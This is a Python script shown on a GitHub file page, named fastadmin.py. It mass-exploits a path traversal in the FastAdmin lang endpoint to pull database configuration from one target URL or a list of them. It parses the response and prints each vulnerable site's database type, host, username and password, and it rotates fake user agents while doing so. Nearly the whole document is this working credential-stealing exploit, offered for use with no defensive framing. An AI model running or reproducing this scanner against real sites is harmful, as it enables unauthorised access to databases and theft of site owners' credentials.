-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathfastadmin.py
106 lines (96 loc) · 5.48 KB
/
fastadmin.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
#!/usr/bin/python3
import httpx
import asyncio
from urllib.parse import *
from fake_useragent import *
import re
import sys
path = '/index/ajax/lang?lang=../../application/database'
ua = UserAgent()
async def one_target(path, url):
async with httpx.AsyncClient(verify=False) as client:
host = urlparse(url).netloc
headers = {
'Host': host,
'Upgrade-Insecure-Requests': '1',
'User-Agent': ua.random,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9'
}
try:
try:
try:
r = await client.get(url=f'{url}{path}', headers=headers)
get_data = r.text.split(',')
type_db_check = re.search('"type":"([a-zA-Z]+)"', r.text)
hostname_check = re.search('"hostname":"([0-9a-zA-Z]+)"', r.text)
db_check = re.search('"database":"([0-9a-zA-Z]+)"', r.text)
username_check = re.search('"username":"([0-9a-zA-Z@]+)"', r.text)
password_check = re.search('"password":"([0-9a-zA-Z@]+)"', r.text)
if type_db_check or hostname_check or db_check or username_check or password_check:
type_db = re.search('"type":"([a-zA-Z]+)"', get_data[0])
hostname = get_data[1].split(':')[1].replace('"', '')
db = get_data[2].split(':')[1].replace('"', '')
username = get_data[3].split(':')[1].replace('"', '')
password = get_data[4].split(':')[1].replace('"', '')
print(f'[+] {url} is vuln\nType database: {type_db[1]}\nHostname: {hostname}\nUsername: {username}\nPassword: {password}')
else:
print(f'[*] {url} Not vulnurable')
except httpx.ConnectError:
print('[*] Problems with host, try again latter')
except httpx.ReadTimeout:
print('[*] Problems with host, try again latter')
except httpx.ConnectTimeout:
print('[*] Problems with host, try again latter')
async def list_targets(path, file):
async with httpx.AsyncClient(verify=False) as client:
with open(file) as t_file:
targets = t_file.readlines()
for target in targets:
target = target.replace('\n', '')
host = urlparse(target).netloc
headers = {
'Host': host,
'Upgrade-Insecure-Requests': '1',
'User-Agent': ua.random,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9'
}
try:
try:
try:
r = await client.get(url=f'{target}{path}', headers=headers)
get_data = r.text.split(',')
type_db_check = re.search('"type":"([a-zA-Z]+)"', r.text)
hostname_check = re.search('"hostname":"([0-9a-zA-Z]+)"', r.text)
db_check = re.search('"database":"([0-9a-zA-Z]+)"', r.text)
username_check = re.search('"username":"([0-9a-zA-Z@]+)"', r.text)
password_check = re.search('"password":"([0-9a-zA-Z@]+)"', r.text)
if type_db_check or hostname_check or db_check or username_check or password_check:
type_db = re.search('"type":"([a-zA-Z]+)"', get_data[0])
hostname = get_data[1].split(':')[1].replace('"', '')
db = get_data[2].split(':')[1].replace('"', '')
username = get_data[3].split(':')[1].replace('"', '')
password = get_data[4].split(':')[1].replace('"', '')
print(f'[+] {target} is vuln\nType database: {type_db[1]}\nHostname: {hostname}\nUsername: {username}\nPassword: {password}')
else:
print(f'[*] {target} not vuln')
continue
except httpx.ConnectError:
continue
except httpx.ReadTimeout:
continue
except httpx.ConnectTimeout:
continue
if len(sys.argv) < 2:
print(f'USAGE: {sys.argv[0]} -l <list of urls> | {sys.argv[0]} -u <target url>\nExamples: python3 {sys.argv[0]} -l targets.txt | python3 {sys.argv[0]} -u https://example.org')
elif sys.argv[1] == '-l':
file = sys.argv[2]
asyncio.run(list_targets(path, file))
elif sys.argv[1] == '-u':
url = sys.argv[2]
asyncio.run(one_target(path, url))
else:
print(f'USAGE: {sys.argv[0]} -l <list of urls>\n{sys.argv[0]} -u <target url>\nExamples: python3 {sys.argv[0]} -l targets.txt or python3 {sys.argv[0]} -u https://example.org')